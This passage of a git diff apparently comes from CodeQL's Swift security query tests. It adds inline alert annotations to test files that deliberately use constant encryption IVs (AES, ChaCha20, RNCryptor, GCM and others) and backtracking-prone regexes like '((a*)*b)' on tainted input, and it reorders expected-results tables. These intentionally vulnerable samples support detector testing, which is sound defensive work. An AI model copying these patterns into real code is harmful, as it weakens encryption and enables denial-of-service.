encryption. | -| test.swift:123:41:123:41 | ivString | test.swift:85:3:85:3 | this string is constant | test.swift:123:41:123:41 | ivString | The static value 'this string is constant' is used as an initialization vector for encryption. | -| test.swift:128:33:128:33 | iv | test.swift:99:25:99:120 | [...] | test.swift:128:33:128:33 | iv | The static value '[...]' is used as an initialization vector for encryption. | -| test.swift:129:33:129:33 | iv2 | test.swift:85:3:85:3 | this string is constant | test.swift:129:33:129:33 | iv2 | The static value 'this string is constant' is used as an initialization vector for encryption. | -| test.swift:130:39:130:39 | ivString | test.swift:85:3:85:3 | this string is constant | test.swift:130:39:130:39 | ivString | The static value 'this string is constant' is used as an initialization vector for encryption. | -| test.swift:135:22:135:22 | iv | test.swift:99:25:99:120 | [...] | test.swift:135:22:135:22 | iv | The static value '[...]' is used as an initialization vector for encryption. | -| test.swift:139:22:139:22 | iv | test.swift:99:25:99:120 | [...] | test.swift:139:22:139:22 | iv | The static value '[...]' is used as an initialization vector for encryption. | -| test.swift:140:22:140:22 | iv | test.swift:99:25:99:120 | [...] | test.swift:140:22:140:22 | iv | The static value '[...]' is used as an initialization vector for encryption. | -| test.swift:145:22:145:22 | iv | test.swift:99:25:99:120 | [...] | test.swift:145:22:145:22 | iv | The static value '[...]' is used as an initialization vector for encryption. | -| test.swift:146:22:146:22 | iv | test.swift:99:25:99:120 | [...] | test.swift:146:22:146:22 | iv | The static value '[...]' is used as an initialization vector for encryption. | -| test.swift:147:22:147:22 | iv | test.swift:99:25:99:120 | [...] | test.swift:147:22:147:22 | iv | The static value '[...]' is used as an initialization vector for encryption. | -| test.swift:153:22:153:22 | iv | test.swift:99:25:99:120 | [...] | test.swift:153:22:153:22 | iv | The static value '[...]' is used as an initialization vector for encryption. | -| test.swift:157:24:157:24 | iv | test.swift:99:25:99:120 | [...] | test.swift:157:24:157:24 | iv | The static value '[...]' is used as an initialization vector for encryption. | -| test.swift:161:22:161:22 | iv | test.swift:99:25:99:120 | [...] | test.swift:161:22:161:22 | iv | The static value '[...]' is used as an initialization vector for encryption. | -| test.swift:162:22:162:22 | iv | test.swift:99:25:99:120 | [...] | test.swift:162:22:162:22 | iv | The static value '[...]' is used as an initialization vector for encryption. | -| test.swift:167:22:167:22 | iv | test.swift:99:25:99:120 | [...] | test.swift:167:22:167:22 | iv | The static value '[...]' is used as an initialization vector for encryption. | -| test.swift:168:22:168:22 | iv | test.swift:99:25:99:120 | [...] | test.swift:168:22:168:22 | iv | The static value '[...]' is used as an initialization vector for encryption. | diff --git a/swift/ql/test/query-tests/Security/CWE-1204/StaticInitializationVector.qlref b/swift/ql/test/query-tests/Security/CWE-1204/StaticInitializationVector.qlref index 36f922580f70..6106d4b12ad9 100644 --- a/swift/ql/test/query-tests/Security/CWE-1204/StaticInitializationVector.qlref +++ b/swift/ql/test/query-tests/Security/CWE-1204/StaticInitializationVector.qlref @@ -1 +1,2 @@ -queries/Security/CWE-1204/StaticInitializationVector.ql +query: queries/Security/CWE-1204/StaticInitializationVector.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/swift/ql/test/query-tests/Security/CWE-1204/rncryptor.swift b/swift/ql/test/query-tests/Security/CWE-1204/rncryptor.swift index 253804cabf15..ea16f7e28234 100644 --- a/swift/ql/test/query-tests/Security/CWE-1204/rncryptor.swift +++ b/swift/ql/test/query-tests/Security/CWE-1204/rncryptor.swift @@ -57,28 +57,28 @@ func test(myPassword: String) { let myKeyDerivationSettings = RNCryptorKeyDerivationSettings() let myHandler = {} let myRandomIV = Data(getRandomArray()) - let myConstIV1 = Data(0) - let myConstIV2 = Data(123) - let myConstIV3 = Data([1,2,3,4,5]) - let myConstIV4 = Data("iv") + let myConstIV1 = Data(0) // $ Source + let myConstIV2 = Data(123) // $ Source + let myConstIV3 = Data([1,2,3,4,5]) // $ Source + let myConstIV4 = Data("iv") // $ Source let mySalt = Data(0) let mySalt2 = Data(0) let _ = RNEncryptor(settings: kRNCryptorAES256Settings, encryptionKey: myKey, hmacKey: myHMACKey, iv: myRandomIV, handler: myHandler) // GOOD - let _ = RNEncryptor(settings: kRNCryptorAES256Settings, encryptionKey: myKey, hmacKey: myHMACKey, iv: myConstIV1, handler: myHandler) // BAD + let _ = RNEncryptor(settings: kRNCryptorAES256Settings, encryptionKey: myKey, hmacKey: myHMACKey, iv: myConstIV1, handler: myHandler) // BAD // $ Alert let _ = RNEncryptor(settings: kRNCryptorAES256Settings, encryptionKey: myKey, HMACKey: myHMACKey, IV: myRandomIV, handler: myHandler) // GOOD - let _ = RNEncryptor(settings: kRNCryptorAES256Settings, encryptionKey: myKey, HMACKey: myHMACKey, IV: myConstIV2, handler: myHandler) // BAD + let _ = RNEncryptor(settings: kRNCryptorAES256Settings, encryptionKey: myKey, HMACKey: myHMACKey, IV: myConstIV2, handler: myHandler) // BAD // $ Alert let _ = RNEncryptor(settings: kRNCryptorAES256Settings, password: myPassword, iv: myRandomIV, encryptionSalt: mySalt, hmacSalt: mySalt2, handler: myHandler) // GOOD - let _ = RNEncryptor(settings: kRNCryptorAES256Settings, password: myPassword, iv: myConstIV3, encryptionSalt: mySalt, hmacSalt: mySalt2, handler: myHandler) // BAD + let _ = RNEncryptor(settings: kRNCryptorAES256Settings, password: myPassword, iv: myConstIV3, encryptionSalt: mySalt, hmacSalt: mySalt2, handler: myHandler) // BAD // $ Alert let _ = RNEncryptor(settings: kRNCryptorAES256Settings, password: myPassword, IV: myRandomIV, encryptionSalt: mySalt, HMACSalt: mySalt2, handler: myHandler) // GOOD - let _ = RNEncryptor(settings: kRNCryptorAES256Settings, password: myPassword, IV: myConstIV4, encryptionSalt: mySalt, HMACSalt: mySalt2, handler: myHandler) // BAD + let _ = RNEncryptor(settings: kRNCryptorAES256Settings, password: myPassword, IV: myConstIV4, encryptionSalt: mySalt, HMACSalt: mySalt2, handler: myHandler) // BAD // $ Alert let _ = try? myEncryptor.encryptData(myData, with: kRNCryptorAES256Settings, encryptionKey: myKey, hmacKey: myHMACKey, iv: myRandomIV) // GOOD - let _ = try? myEncryptor.encryptData(myData, with: kRNCryptorAES256Settings, encryptionKey: myKey, hmacKey: myHMACKey, iv: myConstIV1) // BAD + let _ = try? myEncryptor.encryptData(myData, with: kRNCryptorAES256Settings, encryptionKey: myKey, hmacKey: myHMACKey, iv: myConstIV1) // BAD // $ Alert let _ = try? myEncryptor.encryptData(myData, withSettings: kRNCryptorAES256Settings, encryptionKey: myKey, HMACKey: myHMACKey, IV: myRandomIV) // GOOD - let _ = try? myEncryptor.encryptData(myData, withSettings: kRNCryptorAES256Settings, encryptionKey: myKey, HMACKey: myHMACKey, IV: myConstIV2) // BAD + let _ = try? myEncryptor.encryptData(myData, withSettings: kRNCryptorAES256Settings, encryptionKey: myKey, HMACKey: myHMACKey, IV: myConstIV2) // BAD // $ Alert let _ = try? myEncryptor.encryptData(myData, with: kRNCryptorAES256Settings, password: myPassword, iv: myRandomIV, encryptionSalt: mySalt, hmacSalt: mySalt2) // GOOD - let _ = try? myEncryptor.encryptData(myData, with: kRNCryptorAES256Settings, password: myPassword, iv: myConstIV3, encryptionSalt: mySalt, hmacSalt: mySalt2) // BAD + let _ = try? myEncryptor.encryptData(myData, with: kRNCryptorAES256Settings, password: myPassword, iv: myConstIV3, encryptionSalt: mySalt, hmacSalt: mySalt2) // BAD // $ Alert let _ = try? myEncryptor.encryptData(myData, withSettings: kRNCryptorAES256Settings, password: myPassword, IV: myRandomIV, encryptionSalt: mySalt, HMACSalt: mySalt2) // GOOD - let _ = try? myEncryptor.encryptData(myData, withSettings: kRNCryptorAES256Settings, password: myPassword, IV: myConstIV4, encryptionSalt: mySalt, HMACSalt: mySalt2) // BAD + let _ = try? myEncryptor.encryptData(myData, withSettings: kRNCryptorAES256Settings, password: myPassword, IV: myConstIV4, encryptionSalt: mySalt, HMACSalt: mySalt2) // BAD // $ Alert } diff --git a/swift/ql/test/query-tests/Security/CWE-1204/test.swift b/swift/ql/test/query-tests/Security/CWE-1204/test.swift index 273556ce5bba..a0c4eb028fdf 100644 --- a/swift/ql/test/query-tests/Security/CWE-1204/test.swift +++ b/swift/ql/test/query-tests/Security/CWE-1204/test.swift @@ -51,7 +51,7 @@ final class GCM: BlockMode { enum Mode { case combined, detached } init(iv: Array, additionalAuthenticatedData: Array? = nil, tagLength: Int = 16, mode: Mode = .detached) { } convenience init(iv: Array, authenticationTag: Array, additionalAuthenticatedData: Array? = nil, mode: Mode = .detached) { - self.init(iv: iv, additionalAuthenticatedData: additionalAuthenticatedData, tagLength: authenticationTag.count, mode: mode) + self.init(iv: iv, additionalAuthenticatedData: additionalAuthenticatedData, tagLength: authenticationTag.count, mode: mode) // $ Alert } } @@ -82,7 +82,7 @@ enum Padding: PaddingProtocol { // Helper functions func getConstantString() -> String { - "this string is constant" + "this string is constant" // $ Source } func getConstantArray() -> Array { @@ -96,7 +96,7 @@ func getRandomArray() -> Array { // --- tests --- func test() { - let iv: Array = [0x2a, 0x3a, 0x80, 0x05, 0xaf, 0x46, 0x58, 0x2d, 0x66, 0x52, 0x10, 0xae, 0x86, 0xd3, 0x8e, 0x8f] + let iv: Array = [0x2a, 0x3a, 0x80, 0x05, 0xaf, 0x46, 0x58, 0x2d, 0x66, 0x52, 0x10, 0xae, 0x86, 0xd3, 0x8e, 0x8f] // $ Source let iv2 = getConstantArray() let ivString = getConstantString() @@ -109,63 +109,63 @@ func test() { let keyString = String(cString: key) // AES test cases - let ab1 = AES(key: keyString, iv: ivString) // BAD - let ab2 = AES(key: keyString, iv: ivString, padding: padding) // BAD + let ab1 = AES(key: keyString, iv: ivString) // BAD // $ Alert + let ab2 = AES(key: keyString, iv: ivString, padding: padding) // BAD // $ Alert let ag1 = AES(key: keyString, iv: randomIvString) // GOOD let ag2 = AES(key: keyString, iv: randomIvString, padding: padding) // GOOD // ChaCha20 test cases - let cb1 = ChaCha20(key: keyString, iv: ivString) // BAD + let cb1 = ChaCha20(key: keyString, iv: ivString) // BAD // $ Alert let cg1 = ChaCha20(key: keyString, iv: randomIvString) // GOOD // Blowfish test cases - let bb1 = Blowfish(key: keyString, iv: ivString) // BAD - let bb2 = Blowfish(key: keyString, iv: ivString, padding: padding) // BAD + let bb1 = Blowfish(key: keyString, iv: ivString) // BAD // $ Alert + let bb2 = Blowfish(key: keyString, iv: ivString, padding: padding) // BAD // $ Alert let bg1 = Blowfish(key: keyString, iv: randomIvString) // GOOD let bg2 = Blowfish(key: keyString, iv: randomIvString, padding: padding) // GOOD // Rabbit - let rb1 = Rabbit(key: key, iv: iv) // BAD - let rb2 = Rabbit(key: key, iv: iv2) // BAD - let rb3 = Rabbit(key: keyString, iv: ivString) // BAD + let rb1 = Rabbit(key: key, iv: iv) // BAD // $ Alert + let rb2 = Rabbit(key: key, iv: iv2) // BAD // $ Alert + let rb3 = Rabbit(key: keyString, iv: ivString) // BAD // $ Alert let rg1 = Rabbit(key: key, iv: randomIv) // GOOD let rg2 = Rabbit(key: keyString, iv: randomIvString) // GOOD // CBC - let cbcb1 = CBC(iv: iv) // BAD + let cbcb1 = CBC(iv: iv) // BAD // $ Alert let cbcg1 = CBC(iv: randomIv) // GOOD // CFB - let cfbb1 = CFB(iv: iv) // BAD - let cfbb2 = CFB(iv: iv, segmentSize: CFB.SegmentSize.cfb8) // BAD + let cfbb1 = CFB(iv: iv) // BAD // $ Alert + let cfbb2 = CFB(iv: iv, segmentSize: CFB.SegmentSize.cfb8) // BAD // $ Alert let cfbg1 = CFB(iv: randomIv) // GOOD let cfbg2 = CFB(iv: randomIv, segmentSize: CFB.SegmentSize.cfb8) // GOOD // GCM - let cgmb1 = GCM(iv: iv) // BAD - let cgmb2 = GCM(iv: iv, additionalAuthenticatedData: randomArray, tagLength: 8, mode: GCM.Mode.combined) // BAD - let cgmb3 = GCM(iv: iv, authenticationTag: randomArray, additionalAuthenticatedData: randomArray, mode: GCM.Mode.combined) // BAD + let cgmb1 = GCM(iv: iv) // BAD // $ Alert + let cgmb2 = GCM(iv: iv, additionalAuthenticatedData: randomArray, tagLength: 8, mode: GCM.Mode.combined) // BAD // $ Alert + let cgmb3 = GCM(iv: iv, authenticationTag: randomArray, additionalAuthenticatedData: randomArray, mode: GCM.Mode.combined) // BAD // $ Alert let cgmg1 = GCM(iv: randomIv) // GOOD let cgmg2 = GCM(iv: randomIv, additionalAuthenticatedData: randomArray, tagLength: 8, mode: GCM.Mode.combined) // GOOD let cgmg3 = GCM(iv: randomIv, authenticationTag: randomArray, additionalAuthenticatedData: randomArray, mode: GCM.Mode.combined) // GOOD // OFB - let ofbb1 = OFB(iv: iv) // BAD + let ofbb1 = OFB(iv: iv) // BAD // $ Alert let ofbg1 = OFB(iv: randomIv) // GOOD // PCBC - let pcbcb1 = PCBC(iv: iv) // BAD + let pcbcb1 = PCBC(iv: iv) // BAD // $ Alert let pcbcg1 = PCBC(iv: randomIv) // GOOD // CCM - let ccmb1 = CCM(iv: iv, tagLength: 0, messageLength: 0, additionalAuthenticatedData: randomArray) // BAD - let ccmb2 = CCM(iv: iv, tagLength: 0, messageLength: 0, authenticationTag: randomArray, additionalAuthenticatedData: randomArray) // BAD + let ccmb1 = CCM(iv: iv, tagLength: 0, messageLength: 0, additionalAuthenticatedData: randomArray) // BAD // $ Alert + let ccmb2 = CCM(iv: iv, tagLength: 0, messageLength: 0, authenticationTag: randomArray, additionalAuthenticatedData: randomArray) // BAD // $ Alert let ccmg1 = CCM(iv: randomIv, tagLength: 0, messageLength: 0, additionalAuthenticatedData: randomArray) // GOOD let ccmg2 = CCM(iv: randomIv, tagLength: 0, messageLength: 0, authenticationTag: randomArray, additionalAuthenticatedData: randomArray) // GOOD // CTR - let ctrb1 = CTR(iv: iv) // BAD - let ctrb2 = CTR(iv: iv, counter: 0) // BAD + let ctrb1 = CTR(iv: iv) // BAD // $ Alert + let ctrb2 = CTR(iv: iv, counter: 0) // BAD // $ Alert let ctrg1 = CTR(iv: randomIv) // GOOD let ctrg2 = CTR(iv: randomIv, counter: 0) // GOOD } diff --git a/swift/ql/test/query-tests/Security/CWE-1333/ReDoS.qlref b/swift/ql/test/query-tests/Security/CWE-1333/ReDoS.qlref index a0bdcd8a864c..5294bedca639 100644 --- a/swift/ql/test/query-tests/Security/CWE-1333/ReDoS.qlref +++ b/swift/ql/test/query-tests/Security/CWE-1333/ReDoS.qlref @@ -1 +1,2 @@ -queries/Security/CWE-1333/ReDoS.ql \ No newline at end of file +query: queries/Security/CWE-1333/ReDoS.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/swift/ql/test/query-tests/Security/CWE-1333/ReDoS.swift b/swift/ql/test/query-tests/Security/CWE-1333/ReDoS.swift index 0349bac0669d..91beb7118da1 100644 --- a/swift/ql/test/query-tests/Security/CWE-1333/ReDoS.swift +++ b/swift/ql/test/query-tests/Security/CWE-1333/ReDoS.swift @@ -61,25 +61,25 @@ func myRegexpTests(myUrl: URL) throws { // Regex _ = "((a*)*b)" // GOOD (never used) - _ = try Regex("((a*)*b)") // DUBIOUS (never used) [FLAGGED] - _ = try Regex("((a*)*b)").firstMatch(in: untainted) // DUBIOUS (never used on tainted input) [FLAGGED] - _ = try Regex("((a*)*b)").firstMatch(in: tainted) // BAD + _ = try Regex("((a*)*b)") // DUBIOUS (never used) [FLAGGED] // $ Alert + _ = try Regex("((a*)*b)").firstMatch(in: untainted) // DUBIOUS (never used on tainted input) [FLAGGED] // $ Alert + _ = try Regex("((a*)*b)").firstMatch(in: tainted) // BAD // $ Alert _ = try Regex(".*").firstMatch(in: tainted) // GOOD (safe regex) - let str = "((a*)*b)" // BAD + let str = "((a*)*b)" // BAD // $ Alert let regex = try Regex(str) _ = try regex.firstMatch(in: tainted) - _ = try Regex(#"(?is)X(?:.|\n)*Y"#) // BAD - suggested attack should begin with 'x' or 'X', *not* 'isx' or 'isX' + _ = try Regex(#"(?is)X(?:.|\n)*Y"#) // BAD - suggested attack should begin with 'x' or 'X', *not* 'isx' or 'isX' // $ Alert // NSRegularExpression - _ = try? NSRegularExpression(pattern: "((a*)*b)") // DUBIOUS (never used) [FLAGGED] + _ = try? NSRegularExpression(pattern: "((a*)*b)") // DUBIOUS (never used) [FLAGGED] // $ Alert - let nsregex1 = try? NSRegularExpression(pattern: "((a*)*b)") // DUBIOUS (never used on tainted input) [FLAGGED] + let nsregex1 = try? NSRegularExpression(pattern: "((a*)*b)") // DUBIOUS (never used on tainted input) [FLAGGED] // $ Alert _ = nsregex1?.stringByReplacingMatches(in: untainted, range: NSRange(location: 0, length: untainted.utf16.count), withTemplate: "") - let nsregex2 = try? NSRegularExpression(pattern: "((a*)*b)") // BAD + let nsregex2 = try? NSRegularExpression(pattern: "((a*)*b)") // BAD // $ Alert _ = nsregex2?.stringByReplacingMatches(in: tainted, range: NSRange(location: 0, length: tainted.utf16.count), withTemplate: "") let nsregex3 = try? NSRegularExpression(pattern: ".*") // GOOD (safe regex) diff --git a/swift/ql/test/query-tests/Security/CWE-134/UncontrolledFormatString.expected b/swift/ql/test/query-tests/Security/CWE-134/UncontrolledFormatString.expected index 94dd27a82c2f..5e76f12687d2 100644 --- a/swift/ql/test/query-tests/Security/CWE-134/UncontrolledFormatString.expected +++ b/swift/ql/test/query-tests/Security/CWE-134/UncontrolledFormatString.expected @@ -1,3 +1,27 @@ +#select +| UncontrolledFormatString.swift:79:16:79:16 | format | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | UncontrolledFormatString.swift:79:16:79:16 | format | This format string depends on $@. | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | this user-provided value | +| UncontrolledFormatString.swift:97:24:97:24 | tainted | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | UncontrolledFormatString.swift:97:24:97:24 | tainted | This format string depends on $@. | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | this user-provided value | +| UncontrolledFormatString.swift:100:24:100:24 | tainted | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | UncontrolledFormatString.swift:100:24:100:24 | tainted | This format string depends on $@. | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | this user-provided value | +| UncontrolledFormatString.swift:101:24:101:24 | tainted | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | UncontrolledFormatString.swift:101:24:101:24 | tainted | This format string depends on $@. | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | this user-provided value | +| UncontrolledFormatString.swift:103:24:103:24 | tainted | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | UncontrolledFormatString.swift:103:24:103:24 | tainted | This format string depends on $@. | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | this user-provided value | +| UncontrolledFormatString.swift:104:24:104:24 | tainted | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | UncontrolledFormatString.swift:104:24:104:24 | tainted | This format string depends on $@. | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | this user-provided value | +| UncontrolledFormatString.swift:105:24:105:24 | tainted | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | UncontrolledFormatString.swift:105:24:105:24 | tainted | This format string depends on $@. | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | this user-provided value | +| UncontrolledFormatString.swift:106:42:106:42 | tainted | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | UncontrolledFormatString.swift:106:42:106:42 | tainted | This format string depends on $@. | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | this user-provided value | +| UncontrolledFormatString.swift:108:26:108:50 | call to NSString.init(string:) | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | UncontrolledFormatString.swift:108:26:108:50 | call to NSString.init(string:) | This format string depends on $@. | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | this user-provided value | +| UncontrolledFormatString.swift:109:40:109:64 | call to NSString.init(string:) | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | UncontrolledFormatString.swift:109:40:109:64 | call to NSString.init(string:) | This format string depends on $@. | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | this user-provided value | +| UncontrolledFormatString.swift:111:33:111:57 | call to NSString.init(string:) | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | UncontrolledFormatString.swift:111:33:111:57 | call to NSString.init(string:) | This format string depends on $@. | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | this user-provided value | +| UncontrolledFormatString.swift:112:47:112:71 | call to NSString.init(string:) | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | UncontrolledFormatString.swift:112:47:112:71 | call to NSString.init(string:) | This format string depends on $@. | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | this user-provided value | +| UncontrolledFormatString.swift:115:11:115:11 | tainted | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | UncontrolledFormatString.swift:115:11:115:11 | tainted | This format string depends on $@. | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | this user-provided value | +| UncontrolledFormatString.swift:116:11:116:11 | tainted | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | UncontrolledFormatString.swift:116:11:116:11 | tainted | This format string depends on $@. | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | this user-provided value | +| UncontrolledFormatString.swift:118:61:118:61 | tainted | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | UncontrolledFormatString.swift:118:61:118:61 | tainted | This format string depends on $@. | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | this user-provided value | +| UncontrolledFormatString.swift:130:39:130:39 | tainted | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | UncontrolledFormatString.swift:130:39:130:39 | tainted | This format string depends on $@. | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | this user-provided value | +| UncontrolledFormatString.swift:135:20:135:44 | call to NSString.init(string:) | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | UncontrolledFormatString.swift:135:20:135:44 | call to NSString.init(string:) | This format string depends on $@. | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | this user-provided value | +| UncontrolledFormatString.swift:141:24:141:24 | cstr | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | UncontrolledFormatString.swift:141:24:141:24 | cstr | This format string depends on $@. | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | this user-provided value | +| UncontrolledFormatString.swift:143:21:143:21 | cstr | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | UncontrolledFormatString.swift:143:21:143:21 | cstr | This format string depends on $@. | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | this user-provided value | +| UncontrolledFormatString.swift:145:27:145:27 | cstr | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | UncontrolledFormatString.swift:145:27:145:27 | cstr | This format string depends on $@. | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | this user-provided value | +| UncontrolledFormatString.swift:147:35:147:35 | cstr | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | UncontrolledFormatString.swift:147:35:147:35 | cstr | This format string depends on $@. | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | this user-provided value | +| UncontrolledFormatString.swift:154:26:154:26 | tainted | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | UncontrolledFormatString.swift:154:26:154:26 | tainted | This format string depends on $@. | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | this user-provided value | +| UncontrolledFormatString.swift:156:32:156:32 | tainted | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | UncontrolledFormatString.swift:156:32:156:32 | tainted | This format string depends on $@. | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | this user-provided value | edges | UncontrolledFormatString.swift:77:12:77:22 | format | UncontrolledFormatString.swift:78:22:80:5 | format | provenance | | | UncontrolledFormatString.swift:78:22:80:5 | format | UncontrolledFormatString.swift:78:22:80:5 | { ... } [format] | provenance | | @@ -72,27 +96,3 @@ nodes | UncontrolledFormatString.swift:154:26:154:26 | tainted | semmle.label | tainted | | UncontrolledFormatString.swift:156:32:156:32 | tainted | semmle.label | tainted | subpaths -#select -| UncontrolledFormatString.swift:79:16:79:16 | format | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | UncontrolledFormatString.swift:79:16:79:16 | format | This format string depends on $@. | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | this user-provided value | -| UncontrolledFormatString.swift:97:24:97:24 | tainted | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | UncontrolledFormatString.swift:97:24:97:24 | tainted | This format string depends on $@. | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | this user-provided value | -| UncontrolledFormatString.swift:100:24:100:24 | tainted | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | UncontrolledFormatString.swift:100:24:100:24 | tainted | This format string depends on $@. | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | this user-provided value | -| UncontrolledFormatString.swift:101:24:101:24 | tainted | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | UncontrolledFormatString.swift:101:24:101:24 | tainted | This format string depends on $@. | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | this user-provided value | -| UncontrolledFormatString.swift:103:24:103:24 | tainted | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | UncontrolledFormatString.swift:103:24:103:24 | tainted | This format string depends on $@. | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | this user-provided value | -| UncontrolledFormatString.swift:104:24:104:24 | tainted | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | UncontrolledFormatString.swift:104:24:104:24 | tainted | This format string depends on $@. | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | this user-provided value | -| UncontrolledFormatString.swift:105:24:105:24 | tainted | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | UncontrolledFormatString.swift:105:24:105:24 | tainted | This format string depends on $@. | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | this user-provided value | -| UncontrolledFormatString.swift:106:42:106:42 | tainted | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | UncontrolledFormatString.swift:106:42:106:42 | tainted | This format string depends on $@. | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | this user-provided value | -| UncontrolledFormatString.swift:108:26:108:50 | call to NSString.init(string:) | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | UncontrolledFormatString.swift:108:26:108:50 | call to NSString.init(string:) | This format string depends on $@. | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | this user-provided value | -| UncontrolledFormatString.swift:109:40:109:64 | call to NSString.init(string:) | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | UncontrolledFormatString.swift:109:40:109:64 | call to NSString.init(string:) | This format string depends on $@. | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | this user-provided value | -| UncontrolledFormatString.swift:111:33:111:57 | call to NSString.init(string:) | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | UncontrolledFormatString.swift:111:33:111:57 | call to NSString.init(string:) | This format string depends on $@. | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | this user-provided value | -| UncontrolledFormatString.swift:112:47:112:71 | call to NSString.init(string:) | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | UncontrolledFormatString.swift:112:47:112:71 | call to NSString.init(string:) | This format string depends on $@. | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | this user-provided value | -| UncontrolledFormatString.swift:115:11:115:11 | tainted | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | UncontrolledFormatString.swift:115:11:115:11 | tainted | This format string depends on $@. | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | this user-provided value | -| UncontrolledFormatString.swift:116:11:116:11 | tainted | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | UncontrolledFormatString.swift:116:11:116:11 | tainted | This format string depends on $@. | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | this user-provided value | -| UncontrolledFormatString.swift:118:61:118:61 | tainted | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | UncontrolledFormatString.swift:118:61:118:61 | tainted | This format string depends on $@. | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | this user-provided value | -| UncontrolledFormatString.swift:130:39:130:39 | tainted | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | UncontrolledFormatString.swift:130:39:130:39 | tainted | This format string depends on $@. | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | this user-provided value | -| UncontrolledFormatString.swift:135:20:135:44 | call to NSString.init(string:) | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | UncontrolledFormatString.swift:135:20:135:44 | call to NSString.init(string:) | This format string depends on $@. | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | this user-provided value | -| 